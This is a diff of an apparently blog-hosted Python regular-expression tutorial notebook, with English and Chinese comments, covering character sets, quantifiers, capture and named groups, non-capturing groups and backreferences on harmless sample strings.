    re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  #1 is min, 4 is max
    'aaaa'
     
    -
    re.search(r'\w{1,10}\W{0,4}\w+',"abcdefnc abcd").group()
    # 1-10 \w characters,
    # 0-4 \W chracters,
    # 1+ \w characters
    +
    1
    2
    3
    4
    re.search(r'\w{1,10}\W{0,4}\w+',"abcdefnc abcd").group()
    # 1-10 \w characters,
    # 0-4 \W chracters,
    # 1+ \w characters
    'abcdefnc abcd'
     
    -
    re.search(r'\w{1,}\W{0,}\w+',"abcdefnc abcd").group() #at least 1, at least 0, 1+
    +
    1
    re.search(r'\w{1,}\W{0,}\w+',"abcdefnc abcd").group() #at least 1, at least 0, 1+
    'abcdefnc abcd'
     

    Other types of characters sets

    '\d' = matches digits [0-9]

    '\D' = matches This matches any non-digit character; ~\d

    -
    import re
    string = '23abced++'
    re.search('\d+', string).group()
    +
    1
    2
    3
    import re
    string = '23abced++'
    re.search('\d+', string).group()
    '23'
     

    '\s' = matches any whitespace character, new lines, tabs, spaces etc 匹配任何空白字符,新行,制表符,空格等

    '\S' = matches any non-whitespace chracter : ~\s 匹配任何非空格字符:~\s

    -
    string = '23abced++'
    re.search('\S+', string).group() # no spaces
    +
    1
    2
    string = '23abced++'
    re.search('\S+', string).group() # no spaces
    '23abced++'
     
    -
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
    -
    (re.findall('\S+', string))  # 返回 string 中所有的单词
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
    +
    1
    (re.findall('\S+', string))  # 返回 string 中所有的单词
    ['Robots',
      'are',
      'branching',
    @@ -889,30 +887,30 @@ 

    ' '.join(re.findall('\S+', string))
    +
    1
    ' '.join(re.findall('\S+', string))
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'
     

    . the dot matches any character excerpt the newline. 点匹配除换行符以外的任何字符。

    -
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
    -
    re.search('.+', string).group()  # no new line
    +
    1
    2
    3
    4
    5
    6
    7
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

    In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

    This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''
    +
    1
    re.search('.+', string).group()  # no new line
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
     
    -
    re.search('.+', string, flags = re.DOTALL).group()
    +
    1
    re.search('.+', string, flags = re.DOTALL).group()
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'
     

    Creating your own character sets

    [A-Z] '-' is a metacharacter when used in [] (custom character sets) '-'[](自定义字符集)中使用时是一个元字符

    -
    string = 'Hello, There, How, Are, You'
    -
    re.findall('[A-Z]', string)  # pulls out all capital letters 取出所有大写字母
    +
    1
    string = 'Hello, There, How, Are, You'
    +
    1
    re.findall('[A-Z]', string)  # pulls out all capital letters 取出所有大写字母
    ['H', 'T', 'H', 'A', 'Y']
     
    -
    re.findall('[A-Z,]', string)
    # here we search for any capital letters or a comma
    # 这里我们搜索大写字母或逗号
    +
    1
    2
    3
    re.findall('[A-Z,]', string)
    # here we search for any capital letters or a comma
    # 这里我们搜索大写字母或逗号
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
     
    -
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Z,.]', string) # 在这里 . 只是一个字符集而不是之前所讲的所有非换行符
    +
    1
    2
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Z,.]', string) # 在这里 . 只是一个字符集而不是之前所讲的所有非换行符
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
     
    -
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Za-z,\s.]', string) # 大写字母, 小写字母, 逗号, 非空白, 句点
    +
    1
    2
    string = 'Hello, There, How, Are, You...'
    re.findall('[A-Za-z,\s.]', string) # 大写字母, 小写字母, 逗号, 非空白, 句点
    ['H',
      'e',
      'l',
    @@ -945,33 +943,33 @@ 

    Quantifers with custom sets

    -
    import re
    +
    1
    import re
    • + 出现一次或更多
    • ? 出现 0 或 1 次
    • * 出现 0 次或更多
    • {} 自定义出现次数
    -
    string = 'HELLO, There, How, Are, You...'
    -
    re.search('[A-Z]+', string)
    +
    1
    string = 'HELLO, There, How, Are, You...'
    +
    1
    re.search('[A-Z]+', string)
    <re.Match object; span=(0, 5), match='HELLO'>
     
    -
    re.findall('[A-Z]+', string)
    +
    1
    re.findall('[A-Z]+', string)
    ['HELLO', 'T', 'H', 'A', 'Y']
     
    -
    re.findall('[A-Z]{2,}', string)  # 2 or more
    +
    1
    re.findall('[A-Z]{2,}', string)  # 2 or more
    ['HELLO']
     
    -
    # one or more of 4 types of characters
    # 四种字符中的一种或多种
    re.search('[A-Za-z\s,]+', string).group()
    +
    1
    2
    3
    # one or more of 4 types of characters
    # 四种字符中的一种或多种
    re.search('[A-Za-z\s,]+', string).group()
    'HELLO, There, How, Are, You'
     
    -
    re.findall('[A-Z]?[a-z\s,]+', string)
    +
    1
    re.findall('[A-Z]?[a-z\s,]+', string)
    ['O, ', 'There, ', 'How, ', 'Are, ', 'You']
     
    -
    # ^ is a metacharacter within brackets
    # ^是括号中的元字符
    # 表示相反
    re.search('[^A-Za-z\s,]+', string).group()
    +
    1
    2
    3
    4
    # ^ is a metacharacter within brackets
    # ^是括号中的元字符
    # 表示相反
    re.search('[^A-Za-z\s,]+', string).group()
    '...'
     
    -
    re.findall('[^A-Z]+', string) # 匹配所有非大写字符
    +
    1
    re.findall('[^A-Z]+', string) # 匹配所有非大写字符
    [', ', 'here, ', 'ow, ', 're, ', 'ou...']
     

    GROUPS

    @@ -982,8 +980,8 @@

    GROUPS

    -
    # contrived example 举例
    import re
    string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
    -
    re.findall('[A-Za-z]+ \w+ \d+ \w+', string)
    +
    1
    2
    3
    # contrived example 举例
    import re
    string = 'John has 6 cats but I think my friend Susan has 3 dogs and Mike has 8 fishes'
    +
    1
    re.findall('[A-Za-z]+ \w+ \d+ \w+', string)
    ['John has 6 cats', 'Susan has 3 dogs', 'Mike has 8 fishes']
     
      @@ -993,17 +991,17 @@

      GROUPS

    -
    re.findall('([A-Za-z]+) \w+ \d+ \w+', string) # to pull out just the names 只把名字取出来
    +
    1
    re.findall('([A-Za-z]+) \w+ \d+ \w+', string) # to pull out just the names 只把名字取出来
    ['John', 'Susan', 'Mike']
     
    -
    re.findall('[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out animals 取出所有动物
    +
    1
    re.findall('[A-Za-z]+ \w+ \d+ (\w+)', string) # pull out animals 取出所有动物
    ['cats', 'dogs', 'fishes']
     
    -
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    # use original string to make sure matching is correct, then use groups to pull out the info you want
    # 使用原始字符串确保匹配是正确的,然后使用组拉出你想要的信息
    +
    1
    2
    3
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    # use original string to make sure matching is correct, then use groups to pull out the info you want
    # 使用原始字符串确保匹配是正确的,然后使用组拉出你想要的信息
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     
    -
    # organize the data by data-types 按数据类型组织数据
    info = re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    -
    info
    +
    1
    2
    # organize the data by data-types 按数据类型组织数据
    info = re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    +
    1
    info
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     

    Python3 zip() 函数

    @@ -1011,46 +1009,46 @@

    GROUPS

  • zip() 函数用于将可迭代的对象作为参数,将对象中对应的元素打包成一个个元组,然后返回由这些元组组成的对象,这样做的好处是节约了不少的内存。
  • 与 zip 相反,zip(*) 可理解为解压,返回二维矩阵式
  • -
    list(zip(*info))  # organize your data by categories 按类别组织数据
    +
    1
    list(zip(*info))  # organize your data by categories 按类别组织数据
    [('John', 'Susan', 'Mike'), ('6', '3', '8'), ('cats', 'dogs', 'fishes')]
     
    -
    match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups 抽出三组
    match
    +
    1
    2
    match = re.search('([A-Za-z]+) \w+ (\d+) (\w+)', string)  # pulls out three groups 抽出三组
    match
    <re.Match object; span=(0, 15), match='John has 6 cats'>
     
    -
    match.group(0)
    +
    1
    match.group(0)
    'John has 6 cats'
     
    -
    match.groups()
    +
    1
    match.groups()
    ('John', '6', 'cats')
     
    -
    match.group(1)
    +
    1
    match.group(1)
    'John'
     
    -
    match.group(2)
    +
    1
    match.group(2)
    '6'
     
    -
    match.group(3)
    +
    1
    match.group(3)
    'cats'
     
    -
    match.group(1, 3)  # multiple groups 多个组
    +
    1
    match.group(1, 3)  # multiple groups 多个组
    ('John', 'cats')
     
    -
    match.group(3, 2, 1, 1)  # change the order 改变顺序
    +
    1
    match.group(3, 2, 1, 1)  # change the order 改变顺序
    ('cats', '6', 'John', 'John')
     
    -
    match.span()
    +
    1
    match.span()
    (0, 15)
     
    -
    match.span(2)
    +
    1
    match.span(2)
    (9, 10)
     
    -
    match.span(3)
    +
    1
    match.span(3)
    (11, 15)
     
    -
    match.start(3)
    +
    1
    match.start(3)
    11
     
    -
    # find all has no group function
    # re.findall 没有 group 函数
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    +
    1
    2
    3
    # find all has no group function
    # re.findall 没有 group 函数
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string).group(1)
    ---------------------------------------------------------------------------
     
     AttributeError                            Traceback (most recent call last)
    @@ -1063,10 +1061,10 @@ 

    GROUPS

    AttributeError: 'list' object has no attribute 'group'
    -
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    +
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0]
    ('John', '6', 'cats')
     
    -
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # 这也不好使
    +
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)[0].group(1)  # 这也不好使
    ---------------------------------------------------------------------------
     
     AttributeError                            Traceback (most recent call last)
    @@ -1077,16 +1075,16 @@ 

    GROUPS

    AttributeError: 'tuple' object has no attribute 'group'
    -
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    +
    1
    re.findall('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    [('John', '6', 'cats'), ('Susan', '3', 'dogs'), ('Mike', '8', 'fishes')]
     
    -
    data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # 组中组
    -
    data
    +
    1
    data = re.findall('(([A-Za-z]+) \w+ (\d+) (\w+))', string)  # 组中组
    +
    1
    data
    [('John has 6 cats', 'John', '6', 'cats'),
      ('Susan has 3 dogs', 'Susan', '3', 'dogs'),
      ('Mike has 8 fishes', 'Mike', '8', 'fishes')]
     
    -
    # 你只能这么干
    for i in data:
    print(i[3])
    +
    1
    2
    3
    # 你只能这么干
    for i in data:
    print(i[3])
    cats
     dogs
     fishes
    @@ -1102,34 +1100,34 @@ 

    GROUPS

    Python next() 函数

    -
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    next(it).groups()
    +
    1
    2
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    next(it).groups()
    ('John', '6', 'cats')
     
    -
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print (element.group(1, 3, 2)) # don't forget iterators exhaust
    +
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print (element.group(1, 3, 2)) # don't forget iterators exhaust
    ('John', 'cats', '6')
     ('Susan', 'dogs', '3')
     ('Mike', 'fishes', '8')
     
    -
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.group())
    +
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.group())
    John has 6 cats
     Susan has 3 dogs
     Mike has 8 fishes
     
    -
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.groups())
    +
    1
    2
    3
    it = re.finditer('([A-Za-z]+) \w+ (\d+) (\w+)', string)
    for element in it:
    print(element.groups())
    ('John', '6', 'cats')
     ('Susan', '3', 'dogs')
     ('Mike', '8', 'fishes')
     

    Naming Groups

    -
    import re
    -
    string = 'New York, New York 11369'
    +
    1
    import re
    +
    1
    string = 'New York, New York 11369'
    • ([A-Za-z\s]+) 寄件地址
    • ([A-Za-z\s]+) 收件地址
    • (\d+) 邮编
    -
    match = re.search('([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
    -
    match.group(1), match.group(2), match.group(3), match.group(0)
    +
    1
    match = re.search('([A-Za-z\s]+),([A-Za-z\s]+)(\d+)', string)
    +
    1
    match.group(1), match.group(2), match.group(3), match.group(0)
    ('New York', ' New York ', '11369', 'New York, New York 11369')
     

    ?P< > to name a group-- group name inside the <>, followed by RE for group

    @@ -1138,18 +1136,18 @@

    Naming Groups

  • (?P<State>)
  • (?P<ZipCode>)
  • -
    pattern = re.compile('(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
    -
    match = re.search(pattern, string)
    -
    match.group('City'), match.group('State'), match.group('ZipCode')
    +
    1
    pattern = re.compile('(?P<City>[A-Za-z\s]+),(?P<State>[A-Za-z\s]+)(?P<ZipCode>\d+)')
    +
    1
    match = re.search(pattern, string)
    +
    1
    match.group('City'), match.group('State'), match.group('ZipCode')
    ('New York', ' New York ', '11369')
     
    -
    match.group(1)
    +
    1
    match.group(1)
    'New York'
     
    -
    match.groups()
    +
    1
    match.groups()
    ('New York', ' New York ', '11369')
     
    -
    # Just incase you forget the names of the groups you used
    # 以防您忘记了您使用的组的名称
    match.groupdict()
    +
    1
    2
    3
    # Just incase you forget the names of the groups you used
    # 以防您忘记了您使用的组的名称
    match.groupdict()
    {'City': 'New York', 'State': ' New York ', 'ZipCode': '11369'}
     

    Quantifiers on groups

    @@ -1160,11 +1158,11 @@

    Quantifi -
    import re
    -
    string = 'abababababab'  # ab repeated many times
    re.search('(ab)+', string) #(ab)+ is many instances of one group repeated 同一组的许多实例重复出现
    +
    1
    import re
    +
    1
    2
    string = 'abababababab'  # ab repeated many times
    re.search('(ab)+', string) #(ab)+ is many instances of one group repeated 同一组的许多实例重复出现
    <re.Match object; span=(0, 12), match='abababababab'>
     
    -
    string = 'abababababab'  # ab repeated many times 重复了很多次

    re.search('[ab]+', string) # this is different
    +
    1
    2
    3
    string = 'abababababab'  # ab repeated many times 重复了很多次

    re.search('[ab]+', string) # this is different
    <re.Match object; span=(0, 12), match='abababababab'>
     
      @@ -1175,25 +1173,25 @@

      Quantifi

    -
    string = 'abababbbbbbb'  # only partial fit to our new string 只有部分符合我们的新字符串
    re.search('(ab)+', string)
    +
    1
    2
    string = 'abababbbbbbb'  # only partial fit to our new string 只有部分符合我们的新字符串
    re.search('(ab)+', string)
    <re.Match object; span=(0, 6), match='ababab'>
     
    -
    string = 'abababbbbbbb'  # but this pattern fits perfectly 但这个模式完全吻合
    re.search('[ab]+', string)
    +
    1
    2
    string = 'abababbbbbbb'  # but this pattern fits perfectly 但这个模式完全吻合
    re.search('[ab]+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
     
    -
    string = 'abababbbbbbb'  # allows flexibility 允许的灵活性
    re.search('(ab)+\w+', string)
    +
    1
    2
    string = 'abababbbbbbb'  # allows flexibility 允许的灵活性
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 12), match='abababbbbbbb'>
     
    -
    string = 'abababsssss'  # allows flexibility
    re.search('(ab)+\w+', string)
    +
    1
    2
    string = 'abababsssss'  # allows flexibility
    re.search('(ab)+\w+', string)
    <re.Match object; span=(0, 11), match='abababsssss'>
     

    Nuances to be wary of

    需要注意的细微差别

    -
    # only one group not multiple groups 只有一个组而不是多个组
    -
    string = 'abababababab' # original string
    match = re.search('(ab)+', string)

    match.group(1)
    # capturing only one group; value is overwritten each time
    # 只捕获一个群体; 值每次都会被覆盖
    +
    1
    # only one group not multiple groups 只有一个组而不是多个组
    +
    1
    2
    3
    4
    5
    6
    string = 'abababababab' # original string
    match = re.search('(ab)+', string)

    match.group(1)
    # capturing only one group; value is overwritten each time
    # 只捕获一个群体; 值每次都会被覆盖
    'ab'
     
    -
    match.group(2) # no value 没有值
    +
    1
    match.group(2) # no value 没有值
    ---------------------------------------------------------------------------
     
     IndexError                                Traceback (most recent call last)
    @@ -1204,10 +1202,10 @@ 

    Nuances IndexError: no such group

    -
    match.groups()  # only one group, group just overwritten 只有一个组,组被覆盖了
    +
    1
    match.groups()  # only one group, group just overwritten 只有一个组,组被覆盖了
    ('ab',)
     
    -
    match.group(0) # the full match, not related to groups 完全匹配,与组无关
    +
    1
    match.group(0) # the full match, not related to groups 完全匹配,与组无关
    'abababababab'
     
      @@ -1217,14 +1215,14 @@

      Nuances

    -
    string = 'ababababab'
    -
    match = re.search ('(ab)+(ab)+', string)
    match
    +
    1
    string = 'ababababab'
    +
    1
    2
    match = re.search ('(ab)+(ab)+', string)
    match
    <re.Match object; span=(0, 10), match='ababababab'>
     
    -
    match.groups()
    +
    1
    match.groups()
    ('ab', 'ab')
     
    -
    match.span(2) # the first group is greedy
    +
    1
    match.span(2) # the first group is greedy
    (8, 10)
     
      @@ -1234,46 +1232,46 @@

      Nuances

    -
    string = '123456789'

    match = re.search('(\d)+', string)
    -
    match
    +
    1
    2
    3
    string = '123456789'

    match = re.search('(\d)+', string)
    +
    1
    match
    <re.Match object; span=(0, 9), match='123456789'>
     
    -
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    +
    1
    (match.groups())  # only one group, and it uses the last value 只有一个组,它使用最后一个值
    ('9',)
     

    Quantifiers with groups within findall

    在 findall 中包含组的量词

    -
    string = '123456789'

    re.findall('(\d)+', string)
    # only pulls out group and last instance
    # 只取出组和最后一个实例
    +
    1
    2
    3
    4
    5
    string = '123456789'

    re.findall('(\d)+', string)
    # only pulls out group and last instance
    # 只取出组和最后一个实例
    ['9']
     
    -
    string = '1234 56789'
    re.findall('(\d)+', string)
    # Here we have two matches 匹配了两个
    +
    1
    2
    3
    string = '1234 56789'
    re.findall('(\d)+', string)
    # Here we have two matches 匹配了两个
    ['4', '9']
     
    -
    re.findall('((\d)+)', string)[1][0] 
    # to find full match create a main group engulfing the smaller groups
    # 要找到完全匹配,创建一个主组,吞噬较小的组
    +
    1
    2
    3
    re.findall('((\d)+)', string)[1][0] 
    # to find full match create a main group engulfing the smaller groups
    # 要找到完全匹配,创建一个主组,吞噬较小的组
    '56789'
     
    -
    # another example
    string = 'abbbbb ababababab'
    re.findall('(ab)+', string) # two instances
    +
    1
    2
    3
    # another example
    string = 'abbbbb ababababab'
    re.findall('(ab)+', string) # two instances
    ['ab', 'ab']
     
    -
    string  = 'abbbbb ababababab'
    re.findall('((ab)+)', string) #full match
    +
    1
    2
    string  = 'abbbbb ababababab'
    re.findall('((ab)+)', string) #full match
    [('ab', 'ab'), ('ababababab', 'ab')]
     

    Groups for word completion

    -
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
    +
    1
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Birthday')
    <re.Match object; span=(0, 14), match='Happy Birthday'>
     
    -
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
    +
    1
    re.search('Happy (Valentines|Birthday|Anniversary)', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>
     
    -
    re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
    +
    1
    re.search('Happy Valentines| Happy Birthday | Happy Anniversary', 'Happy Valentines')
    <re.Match object; span=(0, 16), match='Happy Valentines'>
     

    Non-capture Groups

    -
    import re
    -
    # Here is one such example:
    import re

    string = '1234 56789'
    re.findall('(\d)+', string)
    +
    1
    import re
    +
    1
    2
    3
    4
    5
    # Here is one such example:
    import re

    string = '1234 56789'
    re.findall('(\d)+', string)
    ['4', '9']
     
    -
    re.search('(\d)+', string).groups()  #using search
    +
    1
    re.search('(\d)+', string).groups()  #using search
    ('4',)
     

    捕获组(capturing group)是把多个字符当作一个单元对待的一种方式。通过把字符括在括号内创建捕获组。例如,正则表达式(dog)创建包含字母“d”、“o”和“g”的一个组。输入字符串和捕获组匹配的那一部分将被保存在内存中,以便以后通过反向引用再次使用。

    @@ -1294,11 +1292,11 @@

    Non-capture Gr -
    # comparison 比较
    -
    re.findall('(\d)+', string)
    +
    1
    # comparison 比较
    +
    1
    re.findall('(\d)+', string)
    ['4', '9']
     
    -
    re.findall('(?:\d)+', string)  # with non capture group 非捕获组
    +
    1
    re.findall('(?:\d)+', string)  # with non capture group 非捕获组
    ['1234', '56789']
     
      @@ -1308,17 +1306,17 @@

      Non-capture Gr

    -
    re.findall('\d+', string)
    # when RE has no groups in findall, we output entire match
    # 当 RE 在 findall 中没有组时,我们输出整个匹配
    +
    1
    2
    3
    re.findall('\d+', string)
    # when RE has no groups in findall, we output entire match
    # 当 RE 在 findall 中没有组时,我们输出整个匹配
    ['1234', '56789']
     
    -
    # Another example
    -
    string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,' 
    -
    # We want to pull out all names whose ID has 123 within in
    # 我们要取出所有 ID 包含 123 的名字
    -
    re.findall('(?:123)+ = (\w+),', string)  # three instances
    +
    1
    # Another example
    +
    1
    string  = '123123 = Alex, 123123123 = Danny, 123123123123 = Mike, 456456 = rick, 121212 = John, 132132 = Luis,' 
    +
    1
    2
    # We want to pull out all names whose ID has 123 within in
    # 我们要取出所有 ID 包含 123 的名字
    +
    1
    re.findall('(?:123)+ = (\w+),', string)  # three instances
    ['Alex', 'Danny', 'Mike']
     
    -
    # Another example
    string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
    -
    re.findall('(?:1\*){2,}\d+', string)
    +
    1
    2
    # Another example
    string = '1*1*1*1*22222 1*1*3333 2*1*2*1*222 1*2*2*2*333 3*3*3*444'
    +
    1
    re.findall('(?:1\*){2,}\d+', string)
    ['1*1*1*1*22222', '1*1*3333']
     
      @@ -1334,10 +1332,10 @@

      BE CAR
    • ?: correct!
    • :? incorrect!
    -
    string = '1234 56789'
    match = re.search('(?:\d)+', string) # correct syntax
    print(match.groups())
    +
    1
    2
    3
    string = '1234 56789'
    match = re.search('(?:\d)+', string) # correct syntax
    print(match.groups())
    ()
     
    -
    string = '1234 56789'
    match = re.search('(:?\d)+', string) # :? incorrect syntax!!!!
    print(match.groups())
    +
    1
    2
    3
    string = '1234 56789'
    match = re.search('(:?\d)+', string) # :? incorrect syntax!!!!
    print(match.groups())
    ('4',)
     

    Summary:

    @@ -1357,24 +1355,24 @@

    -
    # syntax and example
    -
    re.search(r'(\w+) \1','Merry Merry Christmas')  # Looking for repeated words 寻找重复的单词
    +
    1
    # syntax and example
    +
    1
    re.search(r'(\w+) \1','Merry Merry Christmas')  # Looking for repeated words 寻找重复的单词
    <re.Match object; span=(0, 11), match='Merry Merry'>
     
    -
    re.search(r'(\w+) \1','Merry Merry Christmas').groups()
    +
    1
    re.search(r'(\w+) \1','Merry Merry Christmas').groups()
    ('Merry',)
     

    \1 is just referencing the first group within the regular expression

    ‘\1’ 匹配的是 所获取的第 1 个()匹配的引用。例如,’(\d)\1’ 匹配两个连续数字字符。如 33aa 中的 33

    -
    # Another example
    -
    re.findall(r'(\w+)','Happy Happy Holidays. Merry Christmas Christmas')
    +
    1
    # Another example
    +
    1
    re.findall(r'(\w+)','Happy Happy Holidays. Merry Christmas Christmas')
    ['Happy', 'Happy', 'Holidays', 'Merry', 'Christmas', 'Christmas']
     
    -
    re.findall(r'(\w+) \1','Happy Happy Holidays. Merry Christmas Christmas')   # Want to look for repeated words 想要寻找重复的单词
    +
    1
    re.findall(r'(\w+) \1','Happy Happy Holidays. Merry Christmas Christmas')   # Want to look for repeated words 想要寻找重复的单词
    ['Happy', 'Christmas']
     
    -
    # another example
    -
    re.findall(r'(\w+) \1','Merry Merry Christmas Christmas Merry Merry Christmas')
    +
    1
    # another example
    +
    1
